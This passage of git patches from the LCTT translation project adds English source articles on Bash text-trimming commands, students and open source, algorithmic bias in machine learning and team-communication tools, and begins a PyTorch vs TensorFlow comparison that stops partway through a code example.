+awk5 used AWK's substring function. The function works on the whole line ($0), starts at the 4th character back from the last character (length($0)-4) and returns 5 characters (5).
+```
+#!/bin/bash
+while read line; do echo "${line: -5}"; done < file > echo5
+exit
+```
+
+echo5 was run as a script and uses a **while** loop for processing one line at a time. The BASH string function "${line: -5}" returns the last 5 characters in "$line".
+```
+grep -o '.....$' file > grep5
+```
+
+In grep5, **grep** searches each line for the last 5 characters (.....$) and returns (with the -o option) just that searched-for string.
+```
+#!/bin/bash
+while read line; do rev <<<"$line" | cut -c1-5 | rev; done < file > rev5
+exit
+```
+
+The rev5 trick in this script has appeared often in online forums. Each line is first reversed with **rev** , then **cut** is used to return the first 5 characters, then the 5-character string is reversed with **rev**.
+```
+sed 's/.*\(.....\)/\1/' file > sed5
+```
+
+sed5 is a simple use of **sed** (GNU sed 4.4) but was surprisingly slow in the trial. In each line, **sed** replaces zero or more characters leading up to the last 5 with just those last 5 (as a backreference).
+```
+#!/bin/bash
+while read line; do tail -c 6 <<<"$line"; done < file > tail5
+exit
+```
+
+The "-c 6" in the tail5 script means that **tail** captures the last 5 characters in each line plus the newline character at the end.
+
+Actually, the "-c" option captures bytes, not characters, meaning if the line ends in multi-byte characters the output will be corrupt. But would you really want to use the ultra-slow **tail** for this job in the first place?
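+
+A quick way to see the difference (assuming a UTF-8 locale, where GNU AWK counts characters rather than bytes):
+```
+# tail -c counts bytes, so a trailing multi-byte character gets chopped up
+printf 'ends in 日本語\n' | tail -c 6
+
+# gawk's length()/substr() count characters in a UTF-8 locale
+printf 'ends in 日本語\n' | awk '{print substr($0,length($0)-4,5)}'
+```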
+
+### About the Author
+
+Bob Mesibov is Tasmanian, retired and a keen Linux tinkerer.
+
+--------------------------------------------------------------------------------
+
+via: http://www.thelinuxrain.com/articles/bash-drivers-start-your-engines
+
+作者:[Bob Mesibov][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://www.thelinuxrain.com
+[1]:http://www.thelinuxrain.com/articles/debian-9-on-a-dell-optiplex-9020-micro
+[2]:http://www.thelinuxrain.com/content/01-articles/201-bash-drivers-start-your-engines/1.png
+[3]:http://www.thelinuxrain.com/content/01-articles/201-bash-drivers-start-your-engines/2.png
From 6c9bd05543da567670467bf2e1248b4ce1da7e32 Mon Sep 17 00:00:00 2001
From: darksun
Date: Fri, 12 Jan 2018 21:37:01 +0800
Subject: [PATCH 268/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Why=20isn't=20ope?=
=?UTF-8?q?n=20source=20hot=20among=20computer=20science=20students=3F?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...rce hot among computer science students.md | 84 +++++++++++++++++++
1 file changed, 84 insertions(+)
create mode 100644 sources/tech/20190110 Why isn-t open source hot among computer science students.md
diff --git a/sources/tech/20190110 Why isn-t open source hot among computer science students.md b/sources/tech/20190110 Why isn-t open source hot among computer science students.md
new file mode 100644
index 0000000000..282d723949
--- /dev/null
+++ b/sources/tech/20190110 Why isn-t open source hot among computer science students.md
@@ -0,0 +1,84 @@
+Why isn't open source hot among computer science students?
+======
+
+![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/EDU_OSDC_OpenClass_520x292_FINAL_JD.png?itok=ly78pMqu)
+
+Image by : opensource.com
+
+The technical savvy and inventive energy of young programmers is alive and well.
+
+This was clear from the diligent work that I witnessed while participating in this year's [PennApps][1], the nation's largest college hackathon. Over the course of 48 hours, my high school- and college-age peers created projects ranging from a [blink-based communication device for shut-in patients][2] to a [burrito maker with IoT connectivity][3]. The spirit of open source was tangible throughout the event, as diverse groups bonded over a mutual desire to build, the free flow of ideas and tech know-how, fearless experimentation and rapid prototyping, and an overwhelming eagerness to participate.
+
+Why then, I wondered, wasn't open source a hot topic among my tech geek peers?
+
+To learn more about what college students think when they hear "open source," I surveyed several college students who are members of the same professional computer science organization I belong to. All members of this community must apply during high school or college and are selected based on their computer science-specific achievements and leadership--whether that means leading a school robotics team, founding a nonprofit to bring coding into insufficiently funded classrooms, or some other worthy endeavor. Given these individuals' accomplishments in computer science, I thought that their perspectives would help in understanding what young programmers find appealing (or unappealing) about open source projects.
+
+The online survey I prepared and disseminated included the following questions:
+
+ * Do you like to code personal projects? Have you ever contributed to an open source project?
+ * Do you feel like it's more beneficial to you to start your own programming projects, or to contribute to existing open source efforts?
+ * How would you compare the prestige associated with coding for an organization that produces open source software versus proprietary software?
+
+
+
+Though the overwhelming majority said that they at least occasionally enjoyed coding personal projects in their spare time, most had never contributed to an open source project. When I further explored this trend, a few common preconceptions about open source projects and organizations came to light. To persuade my peers that open source projects are worth their time, and to provide educators and open source organizations insight on their students, I'll address the three top preconceptions.
+
+### Preconception #1: Creating personal projects from scratch is better experience than contributing to an existing open source project.
+
+Of the college-age programmers I surveyed, 24 out of 26 asserted that starting their own personal projects felt potentially more beneficial than building on open source ones.
+
+As a bright-eyed freshman in computer science, I believed this too. I had often heard from older peers that personal projects would make me more appealing to intern recruiters. No one ever mentioned the possibility of contributing to open source projects--so in my mind, it wasn't relevant.
+
+I now realize that open source projects offer powerful preparation for the real world. Contributing to open source projects cultivates [an awareness of how tools and languages piece together][4] in a way that even individual projects cannot. Moreover, open source is an exercise in coordination and collaboration, building students' [professional skills in communication, teamwork, and problem-solving. ][5]
+
+### Preconception #2: My coding skills just won't cut it.
+
+A few respondents said they were intimidated by open source projects, unsure of where to contribute, or fearful of stunting project progress. Unfortunately, feelings of inferiority, which too often especially affect female programmers, do not stop at the open source community. In fact, "Imposter Syndrome" may even be magnified, as [open source advocates typically reject bureaucracy][6]--and as difficult as bureaucracy makes internal mobility, it helps newcomers know their place in an organization.
+
+I remember how intimidated I felt by contribution guidelines while looking through open source projects on GitHub for the first time. However, guidelines are not intended to encourage exclusivity, but to provide a [guiding hand][7]. To that end, I think of guidelines as a way of establishing expectations without relying on a hierarchical structure.
+
+Several open source projects actively carve a place for new project contributors. [TEAMMATES][8], an educational feedback management tool, is one of the many open source projects that marks issues "up for grabs" for first-timers. In the comments, programmers of all skill levels iron out implementation details, demonstrating that open source is a place for eager new programmers and seasoned software veterans alike. For young programmers who are still hesitant, [a few open source projects][9] have been thoughtful enough to adopt an [Imposter Syndrome disclaimer][10].
+
+### Preconception #3: Proprietary software firms do better work than open source software organizations.
+
+Only five of the 26 respondents I surveyed thought that open and proprietary software organizations were considered equal in prestige. This is likely due to the misperception that "open" means "profitless," and thus low-quality (see [Doesn't 'open source' just mean something is free of charge?][11]).
+
+However, open source software and profitable software are not mutually exclusive. In fact, small and large businesses alike often pay for free open source software to receive technical support services. As [Red Hat CEO Jim Whitehurst explains][12], "We have engineering teams that track every single change--a bug fix, security enhancement, or whatever--made to Linux, and ensure our customers' mission-critical systems remain up-to-date and stable."
+
+Moreover, the nature of openness facilitates rather than hinders quality by enabling more people to examine source code. [Igor Faletski, CEO of Mobify][13], writes that Mobify's team of "25 software developers and quality assurance professionals" is "no match for all the software developers in the world who might make use of [Mobify's open source] platform. Each of them is a potential tester of, or contributor to, the project."
+
+Another problem may be that young programmers are not aware of the open source software they interact with every day. I used many tools--including MySQL, Eclipse, Atom, Audacity, and WordPress--for months or even years without realizing they were open source. College students, who often rush to download syllabus-specified software to complete class assignments, may be unaware of which software is open source. This makes open source seem more foreign than it is.
+
+So students, don't knock open source before you try it. Check out this [list of beginner-friendly projects][14] and [these six starting points][15] to begin your open source journey.
+
+Educators, remind your students of the open source community's history of successful innovation, and lead them toward open source projects outside the classroom. You will help develop sharper, better-prepared, and more confident students.
+
+### About the author
+Susie Choi - Susie is an undergraduate student studying computer science at Duke University. She is interested in the implications of technological innovation and open source principles for issues relating to education and socioeconomic inequality.
+
+--------------------------------------------------------------------------------
+
+via: https://opensource.com/article/17/12/students-and-open-source-3-common-preconceptions
+
+作者:[Susie Choi][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://opensource.com/users/susiechoi
+[1]:http://pennapps.com/
+[2]:https://devpost.com/software/blink-9o2iln
+[3]:https://devpost.com/software/daburrito
+[4]:https://hackernoon.com/benefits-of-contributing-to-open-source-2c97b6f529e9
+[5]:https://opensource.com/education/16/8/5-reasons-student-involvement-open-source
+[6]:https://opensource.com/open-organization/17/7/open-thinking-curb-bureaucracy
+[7]:https://opensource.com/life/16/3/contributor-guidelines-template-and-tips
+[8]:https://github.com/TEAMMATES/teammates/issues?q=is%3Aissue+is%3Aopen+label%3Ad.FirstTimers
+[9]:https://github.com/adriennefriend/imposter-syndrome-disclaimer/blob/master/examples.md
+[10]:https://github.com/adriennefriend/imposter-syndrome-disclaimer
+[11]:https://opensource.com/resources/what-open-source
+[12]:https://hbr.org/2013/01/yes-you-can-make-money-with-op
+[13]:https://hbr.org/2012/10/open-sourcing-may-be-worth
+[14]:https://github.com/MunGell/awesome-for-beginners
+[15]:https://opensource.com/life/16/1/6-beginner-open-source
From ab5b582752c21c81dd6460e95b5e2b9734335a54 Mon Sep 17 00:00:00 2001
From: darksun
Date: Fri, 12 Jan 2018 21:43:14 +0800
Subject: [PATCH 269/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20AI=20and=20machin?=
=?UTF-8?q?e=20learning=20bias=20has=20dangerous=20implications?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...earning bias has dangerous implications.md | 81 +++++++++++++++++++
1 file changed, 81 insertions(+)
create mode 100644 sources/tech/20180111 AI and machine learning bias has dangerous implications.md
diff --git a/sources/tech/20180111 AI and machine learning bias has dangerous implications.md b/sources/tech/20180111 AI and machine learning bias has dangerous implications.md
new file mode 100644
index 0000000000..7a83ebb3a2
--- /dev/null
+++ b/sources/tech/20180111 AI and machine learning bias has dangerous implications.md
@@ -0,0 +1,81 @@
+AI and machine learning bias has dangerous implications
+======
+
+![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/LAW_goodbadugly.png?itok=ZxaimUWU)
+
+Image by : opensource.com
+
+Algorithms are everywhere in our world, and so is bias. From social media news feeds to streaming service recommendations to online shopping, computer algorithms--specifically, machine learning algorithms--have permeated our day-to-day world. As for bias, we need only examine the 2016 American election to understand how deeply--both implicitly and explicitly--it permeates our society as well.
+
+What's often overlooked, however, is the intersection between these two: bias in computer algorithms themselves.
+
+Contrary to what many of us might think, technology is not objective. AI algorithms and their decision-making processes are directly shaped by those who build them--what code they write, what data they use to "[train][1]" the machine learning models, and how they [stress-test][2] the models after they're finished. This means that the programmers' values, biases, and human flaws are reflected in the software. If I fed an image-recognition algorithm the faces of only white researchers in my lab, for instance, it [wouldn't recognize non-white faces as human][3]. Such a conclusion isn't the result of a "stupid" or "unsophisticated" AI, but of a bias in the training data: a lack of diverse faces. This has dangerous consequences.
+
+There's no shortage of examples. [State court systems][4] across the country use "black box" algorithms to recommend prison sentences for convicts. [These algorithms are biased][5] against black individuals because of the data that trained them--so they recommend longer sentences as a result, thus perpetuating existing racial disparities in prisons. All this happens under the guise of objective, "scientific" decision-making.
+
+The United States federal government uses machine-learning algorithms to calculate welfare payouts and other types of subsidies. But [information on these algorithms][6], such as their creators and their training data, is extremely difficult to find--which increases the risk of public officials operating under bias and meting out systematically unfair payments.
+
+This list goes on. From Facebook news algorithms to medical care systems to police body cameras, we as a society are at great risk of inserting our biases--racism, sexism, xenophobia, socioeconomic discrimination, confirmation bias, and more--into machines that will be mass-produced and mass-distributed, operating under the veil of perceived technological objectivity.
+
+This must stop.
+
+While we should by no means halt research and development on artificial intelligence, we need to slow its development such that we tread carefully. The danger of algorithmic bias is already too great.
+
+## How can we fight algorithmic bias?
+
+One of the best ways to fight algorithmic bias is by vetting the training data fed into machine learning models themselves. As [researchers at Microsoft][2] point out, this can take many forms.
+
+The data itself might have a skewed distribution--for instance, programmers may have more data about United States-born citizens than immigrants, and about rich men than poor women. Such imbalances will cause an AI to draw improper conclusions about how our society is actually represented--i.e., that most Americans are wealthy white businessmen--simply because of the way machine-learning models make statistical correlations.
+
+It's also possible, even if men and women are equally represented in training data, that the representations themselves result in prejudiced understandings of humanity. For instance, if all the pictures of "male occupation" are of CEOs and all those of "female occupation" are of secretaries (even if more CEOs are in fact male than female), the AI could conclude that women are inherently not meant to be CEOs.
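+
+To make that kind of audit concrete, here is a minimal Python sketch that counts how often each occupation/gender pairing appears in a labeled training set and flags combinations that are badly under-represented. The data layout, label names, and threshold are assumptions made for illustration, not part of any particular project.
+
+```
+from collections import Counter
+
+# Hypothetical training records: (image_path, occupation_label, gender_label).
+training_data = [
+    ("img_001.jpg", "ceo", "male"),
+    ("img_002.jpg", "secretary", "female"),
+    ("img_003.jpg", "ceo", "male"),
+    # ...thousands more records in a real data set
+]
+
+# Count how often each (occupation, gender) pair appears.
+pair_counts = Counter((occ, gen) for _, occ, gen in training_data)
+total = len(training_data)
+
+occupations = sorted({occ for _, occ, _ in training_data})
+genders = sorted({gen for _, _, gen in training_data})
+
+for occ in occupations:
+    for gen in genders:
+        share = pair_counts[(occ, gen)] / total
+        print(f"{occ}/{gen}: {pair_counts[(occ, gen)]} examples ({share:.1%})")
+        if share < 0.05:  # arbitrary threshold for this sketch
+            print(f"  warning: '{occ}' examples labeled '{gen}' may be too sparse to learn from")
+```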
+
+We can imagine similar issues, for example, with law enforcement AIs that examine representations of criminality in the media, which dozens of studies have shown to be [egregiously slanted][7] towards black and Latino citizens.
+
+Bias in training data can take many other forms as well--unfortunately, more than can be adequately covered here. Nonetheless, vetting training data is just one kind of check; it's also important that AI models are "stress-tested" after they're completed to seek out prejudice.
+
+If we show an Indian face to our camera, is it appropriately recognized? Is our AI less likely to recommend a job candidate from an inner city than a candidate from the suburbs, even if they're equally qualified? How does our terrorism algorithm respond to intelligence on a white domestic terrorist compared to an Iraqi? Can our ER camera pull up medical records of children?
+
+These are obviously difficult issues to resolve in the data itself, but we can begin to identify and address them through comprehensive testing.
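+
+As a sketch of what such a test could look like in code, the Python snippet below compares how often a trained classifier returns a positive outcome for each group of applicants. The model object, its predict() method, the feature names, and the groups are all stand-ins invented for the example; a real stress test would plug in the actual model and real evaluation data.
+
+```
+# Compare positive-outcome rates across groups for any object with a
+# predict(features) method. Everything below is illustrative only.
+def positive_rate_by_group(model, examples):
+    """examples: list of (features, group_label) pairs."""
+    totals, positives = {}, {}
+    for features, group in examples:
+        totals[group] = totals.get(group, 0) + 1
+        if model.predict(features) == 1:
+            positives[group] = positives.get(group, 0) + 1
+    return {g: positives.get(g, 0) / totals[g] for g in totals}
+
+class DummyHiringModel:
+    """Stand-in for a trained model; recommends anyone with 3+ years of experience."""
+    def predict(self, features):
+        return 1 if features["years_experience"] >= 3 else 0
+
+candidates = [
+    ({"years_experience": 5}, "inner_city"),
+    ({"years_experience": 5}, "suburb"),
+    ({"years_experience": 2}, "inner_city"),
+    ({"years_experience": 2}, "suburb"),
+]
+
+for group, rate in positive_rate_by_group(DummyHiringModel(), candidates).items():
+    print(f"{group}: recommended {rate:.0%} of the time")
+# A large gap between equally qualified groups is a signal worth investigating.
+```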
+
+## Why is open source well-suited for this task?
+
+Both open source technology and open source methodologies have extreme potential to help in this fight against algorithmic bias.
+
+Modern artificial intelligence is dominated by open source software, from TensorFlow to IBM Watson to packages like [scikit-learn][8]. The open source community has already proven extremely effective in developing robust and rigorously tested machine-learning tools, so it follows that the same community could effectively build anti-bias tests into that same software.
+
+Debugging tools like [DeepXplore][9], out of Columbia and Lehigh Universities, for example, make the AI stress-testing process extensive yet easy to navigate. This and other projects, such as work being done at [MIT's Computer Science and Artificial Intelligence Lab][10], exemplify the agile and rapid prototyping the open source community should adopt.
+
+Open source technology has also proven to be extremely effective for vetting and sorting large sets of data. Nothing should make this more obvious than the domination of open source tools in the data analysis market (Weka, Rapid Miner, etc.). Tools for identifying data bias should be designed by the open source community, and those techniques should also be applied to the plethora of open training data sets already published on sites like [Kaggle][11].
+
+The open source methodology itself is also well-suited for designing processes to fight bias. Making conversations about software open, democratized, and in tune with social good is pivotal to combating an issue that is partly caused by the very opposite--closed conversations, private software development, and undemocratized decision-making. If online communities, corporations, and academics can adopt these open source characteristics when approaching machine learning, fighting algorithmic bias should become easier.
+
+## How can we all get involved?
+
+Education is extremely important. We all know people who may be unaware of algorithmic bias but who care about its implications--for law, social justice, public policy, and more. It's critical to talk to those people and explain both how the bias is formed and why it matters because the only way to get these conversations started is to start them ourselves.
+
+For those of us who work with artificial intelligence in some capacity--as developers, on the policy side, through academic research, or in other capacities--these conversations are even more important. Those who are designing the artificial intelligence of tomorrow need to understand the extreme dangers that bias presents today; clearly, integrating anti-bias processes into software design depends on this very awareness.
+
+Finally, we should all build and strengthen the open source community around ethical AI. Whether that means contributing to software tools, stress-testing machine learning models, or sifting through gigabytes of training data, it's time we leverage the power of open source methodology to combat one of the greatest threats of our digital age.
+
+--------------------------------------------------------------------------------
+
+via: https://opensource.com/article/18/1/how-open-source-can-fight-algorithmic-bias
+
+作者:[Justin Sherman][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://opensource.com/users/justinsherman
+[1]:https://www.crowdflower.com/what-is-training-data/
+[2]:https://medium.com/microsoft-design/how-to-recognize-exclusion-in-ai-ec2d6d89f850
+[3]:https://www.ted.com/talks/joy_buolamwini_how_i_m_fighting_bias_in_algorithms
+[4]:https://www.wired.com/2017/04/courts-using-ai-sentence-criminals-must-stop-now/
+[5]:https://www.propublica.org/article/machine-bias-risk-assessments-in-criminal-sentencing
+[6]:https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3012499
+[7]:https://www.hivlawandpolicy.org/sites/default/files/Race%20and%20Punishment-%20Racial%20Perceptions%20of%20Crime%20and%20Support%20for%20Punitive%20Policies%20%282014%29.pdf
+[8]:http://scikit-learn.org/stable/
+[9]:https://arxiv.org/pdf/1705.06640.pdf
+[10]:https://www.csail.mit.edu/research/understandable-deep-networks
+[11]:https://www.kaggle.com/datasets
From a210efaaecabd55a7780d3c97ab1bdd720be805a Mon Sep 17 00:00:00 2001
From: darksun
Date: Fri, 12 Jan 2018 21:44:07 +0800
Subject: [PATCH 270/371] add done: 20180111 AI and machine learning bias has
dangerous implications.md
---
...111 AI and machine learning bias has dangerous implications.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename sources/{tech => talk}/20180111 AI and machine learning bias has dangerous implications.md (100%)
diff --git a/sources/tech/20180111 AI and machine learning bias has dangerous implications.md b/sources/talk/20180111 AI and machine learning bias has dangerous implications.md
similarity index 100%
rename from sources/tech/20180111 AI and machine learning bias has dangerous implications.md
rename to sources/talk/20180111 AI and machine learning bias has dangerous implications.md
From b2896a81db43d3a66f9442784caebd971f32a810 Mon Sep 17 00:00:00 2001
From: darksun
Date: Fri, 12 Jan 2018 21:50:21 +0800
Subject: [PATCH 271/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=208=20simple=20ways?=
=?UTF-8?q?=20to=20promote=20team=20communication?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...mple ways to promote team communication.md | 75 +++++++++++++++++++
1 file changed, 75 insertions(+)
create mode 100644 sources/tech/20180110 8 simple ways to promote team communication.md
diff --git a/sources/tech/20180110 8 simple ways to promote team communication.md b/sources/tech/20180110 8 simple ways to promote team communication.md
new file mode 100644
index 0000000000..dc4ee37f72
--- /dev/null
+++ b/sources/tech/20180110 8 simple ways to promote team communication.md
@@ -0,0 +1,75 @@
+8 simple ways to promote team communication
+======
+
+![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/world_remote_teams.png?itok=Wk1yBFv6)
+
+Image by : opensource.com
+
+You might be familiar with the expression: So many tools, so little time. In order to try to save you some time, I've outlined some of my favorite tools that help agile teams work better. If you are an agilist, chances are you're aware of similar tools, but I'm specifically narrowing down the list to tools that appeal to open source enthusiasts.
+
+**Caution!** These tools are a little different than what you may be expecting. There are no project management apps--there is a [great article][1] on that already--so there are no checklists, no integrations with GitHub, just simple ways to organize your thoughts and promote team communication.
+
+### Building teams
+
+In an industry where most people are used to giving and receiving negative feedback, it's rare to share positive feedback with coworkers. It's not surprising--while some enjoy giving compliments, many people struggle with telling someone "way to go" or "couldn't have done this without you." But it never hurts to tell someone they're doing a good job, and it often influences people to work better for the team. Here are two tools that help you share kudos with your coworkers.
+
+ * [Management 3.0][2] has a treasure trove of [free resources][3] for building teams. One tool we find compelling is the concept of Feedback Wraps (and not just because it inspires us to think about burritos). [Feedback Wraps][4] is a six-step process to come up with effective feedback for anyone; you might think it is designed for negative feedback, but we find it's perfect for sharing positive comments.
+ * [Happiness Packets][5] provides a way to share anonymous positive feedback with people in the open source community. It is especially useful for those who aren't comfortable with such a personal interaction or don't know the people they want to reward. Happiness Packets offers a [public archive][6] of comments (from people who agree to share them), so you can look through and get warm fuzzies and ideas on what to say to others if you are struggling to find your own words. As a bonus, its code of conduct process prevents anyone from sending nasty messages.
+
+
+
+### Understanding why
+
+Definitions are hard. In the agile world, keys to success include defining personas, the purpose of a feature, or the product vision, and ensuring the entire agile team understands why they are doing the work they are doing. We are a little disappointed by the limited number of open source tools available that help product managers and owners do their jobs.
+
+One that we highly respect and use frequently to teach teams at Red Hat is the Product Vision Board. It comes from product management expert Roman Pichler, who offers numerous [tools and templates][7] to help teams develop a better understanding of "the why." (Note that you will need to provide your email address to download these files.)
+
+ * The [Product Vision Board][8] template guides teams by asking simple but effective questions to prompt them to think about what they are doing before they think about how they are going to do it.
+ * We also like Roman's [Product Management Test][9]. This is a simple and quick web form that guides teams through the traditional role of a product manager and helps uncover where there may be gaps. We recommend that product management teams periodically complete this test to reassess where they fall.
+
+
+
+### Visualizing work
+
+Have you ever been working on a huge assignment, and the steps to complete it are all jumbled up in your head, out of order, and chaotic? Yeah, us, too. Mind mapping is a technique that helps you visually organize all the thoughts in your head. You don't need to start out understanding how everything fits together--you just need your brain, a whiteboard (or a mind-mapping tool), and some time to think.
+
+ * Our favorite open source tool in this space is [Xmind3][10]. It's available for multiple platforms (Linux, MacOS, and Windows), so you can easily share files back and forth with other people. If you need to have the latest & greatest, there is an [updated version][11], which you can download for free if you don't mind sharing your email.
+ * If you like more variety in your life, Eduard Lucena offers [three additional options][12] in Fedora Magazine. You can find information about these tools' availability in Fedora and other distributions on their project pages.
+
+ * [Labyrinth][13]
+ * [View Your Mind][14]
+ * [FreeMind][15]
+
+
+
+As we wrote at the start, there are many similar tools out there; if you have a favorite open source tool that helps agile teams work better, please share it in the comments.
+
+### About the author
+Jen Krieger - Jen Krieger is Chief Agile Architect at Red Hat. Most of her 20+ year career has been in software development, representing many roles throughout the waterfall and agile lifecycles. At Red Hat, she led a department-wide DevOps movement focusing on CI/CD best practices. Most recently, she worked with the Project Atomic & OpenShift teams. Now Jen is guiding teams across the company into agility in a way that respects and supports Red Hat's commitment to Open Source.
+
+--------------------------------------------------------------------------------
+
+via: https://opensource.com/article/18/1/foss-tools-agile-teams
+
+作者:[Jen Krieger][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://opensource.com/users/jkrieger
+[1]:https://opensource.com/business/16/3/top-project-management-tools-2016
+[2]:https://management30.com/
+[3]:https://management30.com/leadership-resource-hub/
+[4]:https://management30.com/en/practice/feedback-wraps/
+[5]:https://happinesspackets.io/
+[6]:https://www.happinesspackets.io/archive/
+[7]:http://www.romanpichler.com/tools/
+[8]:http://www.romanpichler.com/tools/vision-board/
+[9]:http://www.romanpichler.com/tools/romans-product-management-test/
+[10]:https://sourceforge.net/projects/xmind3/?source=recommended
+[11]:http://www.xmind.net/
+[12]:https://fedoramagazine.org/three-mind-mapping-tools-fedora/
+[13]:https://people.gnome.org/~dscorgie/labyrinth.html
+[14]:http://www.insilmaril.de/vym/
+[15]:http://freemind.sourceforge.net/wiki/index.php/Main_Page
From c97ed434d04a23eae3506b73f1b6bb1c202ba5b7 Mon Sep 17 00:00:00 2001
From: darksun
Date: Fri, 12 Jan 2018 21:51:43 +0800
Subject: [PATCH 272/371] add done: 20180110 8 simple ways to promote team
communication.md
---
.../20180110 8 simple ways to promote team communication.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename sources/{tech => talk}/20180110 8 simple ways to promote team communication.md (100%)
diff --git a/sources/tech/20180110 8 simple ways to promote team communication.md b/sources/talk/20180110 8 simple ways to promote team communication.md
similarity index 100%
rename from sources/tech/20180110 8 simple ways to promote team communication.md
rename to sources/talk/20180110 8 simple ways to promote team communication.md
From c5fadf6f144b5e92eb0450f6be10f78a94da778d Mon Sep 17 00:00:00 2001
From: darksun
Date: Fri, 12 Jan 2018 21:57:13 +0800
Subject: [PATCH 273/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Deep=20learning?=
=?UTF-8?q?=20wars:=20Facebook-backed=20PyTorch=20vs=20Google's=20TensorFl?=
=?UTF-8?q?ow?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...k-backed PyTorch vs Google-s TensorFlow.md | 76 +++++++++++++++++++
1 file changed, 76 insertions(+)
create mode 100644 sources/tech/20170915 Deep learning wars- Facebook-backed PyTorch vs Google-s TensorFlow.md
diff --git a/sources/tech/20170915 Deep learning wars- Facebook-backed PyTorch vs Google-s TensorFlow.md b/sources/tech/20170915 Deep learning wars- Facebook-backed PyTorch vs Google-s TensorFlow.md
new file mode 100644
index 0000000000..5b0014246c
--- /dev/null
+++ b/sources/tech/20170915 Deep learning wars- Facebook-backed PyTorch vs Google-s TensorFlow.md
@@ -0,0 +1,76 @@
+Deep learning wars: Facebook-backed PyTorch vs Google's TensorFlow
+======
+The rapid rise of tools and techniques in artificial intelligence and machine learning of late has been astounding. Deep learning, or "machine learning on steroids" as some say, is one area where data scientists and machine learning experts are spoilt for choice in terms of the libraries and frameworks available. A lot of these frameworks are Python-based, as Python is a general-purpose language that is relatively easy to work with. [Theano][1], [Keras][2], and [TensorFlow][3] are a few of the popular deep learning libraries built on Python, developed with the aim of making the lives of machine learning experts easier.
+
+Google's TensorFlow is a widely used machine learning and deep learning framework. Open sourced in 2015 and backed by a huge community of machine learning experts, TensorFlow has quickly grown to be THE framework of choice for many organizations' machine learning and deep learning needs. PyTorch, on the other hand, is a recently developed Python package from Facebook for training neural networks, adapted from the Lua-based deep learning library Torch. PyTorch is one of the few available DL frameworks that use a tape-based autograd system, which allows dynamic neural networks to be built in a fast and flexible manner.
+
+In this article, we pit PyTorch against TensorFlow and compare different aspects where one edges the other out.
+
+Let's get started!
+
+### What programming languages support PyTorch and TensorFlow?
+
+Although primarily written in C++ and CUDA, TensorFlow contains a Python API sitting over the core engine, making it easier for Pythonistas to use. Additional APIs for C++, Haskell, Java, Go, and Rust are also included, which means developers can code in their preferred language.
+
+Although PyTorch is a Python package, it also provides APIs that let you code in C/C++. And if you are comfortable with the Lua programming language, you can code neural network models in PyTorch using the Torch API.
+
+### How easy are PyTorch and TensorFlow to use?
+
+Used as a standalone framework, TensorFlow can be a bit complex to work with, and it can make training deep learning models more difficult. To reduce this complexity, you can use the Keras wrapper, which sits on top of TensorFlow's complex engine and simplifies the development and training of deep learning models. TensorFlow also supports [distributed training][4], which PyTorch currently doesn't. Thanks to its Python API, TensorFlow is also production-ready; i.e., it can be used to train and deploy enterprise-level deep learning models.
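+
+As a rough illustration of that simplification, here is what a small classifier can look like through Keras (a minimal sketch assuming the standalone keras package with a TensorFlow backend); the layer sizes and random data are placeholders, not a meaningful model.
+
+```
+import numpy as np
+from keras.models import Sequential
+from keras.layers import Dense
+
+# Placeholder data: 1,000 samples with 20 features and a binary label.
+x_train = np.random.random((1000, 20))
+y_train = np.random.randint(2, size=(1000, 1))
+
+model = Sequential()
+model.add(Dense(64, activation='relu', input_dim=20))
+model.add(Dense(1, activation='sigmoid'))
+
+# No graphs, sessions, or placeholders to manage by hand.
+model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])
+model.fit(x_train, y_train, epochs=5, batch_size=32)
+```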
+
+PyTorch was rewritten in Python due to the complexities of Torch. This makes PyTorch feel more native to Python developers. It is an easy-to-use framework that provides maximum flexibility and speed, and it allows quick changes to the code during training without hampering performance. If you already have some experience with deep learning and have used Torch before, you will like PyTorch even more, because of its speed, efficiency, and ease of use. PyTorch includes a custom-made GPU allocator, which makes deep learning models highly memory efficient and, as a result, makes training large deep learning models easier. Hence, large organizations such as Facebook, Twitter, Salesforce, and many more are embracing PyTorch.
+
+### Training Deep Learning models with PyTorch and TensorFlow
+
+Both TensorFlow and PyTorch are used to build and train neural network models.
+
+TensorFlow works with a static computational graph (SCG): the graph is defined before the model starts executing. Once execution starts, the only way to tweak the model is through [tf.Session and tf.placeholder tensors][5].
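+
+A minimal TensorFlow 1.x-style sketch of that static-graph workflow (the shapes and values here are arbitrary): the graph is declared first, and nothing runs until a session feeds it data through a placeholder.
+
+```
+import tensorflow as tf
+
+x = tf.placeholder(tf.float32, shape=[None, 3])  # input supplied at run time
+w = tf.Variable(tf.ones([3, 1]))
+y = tf.matmul(x, w)                              # graph node; nothing executes yet
+
+with tf.Session() as sess:
+    sess.run(tf.global_variables_initializer())
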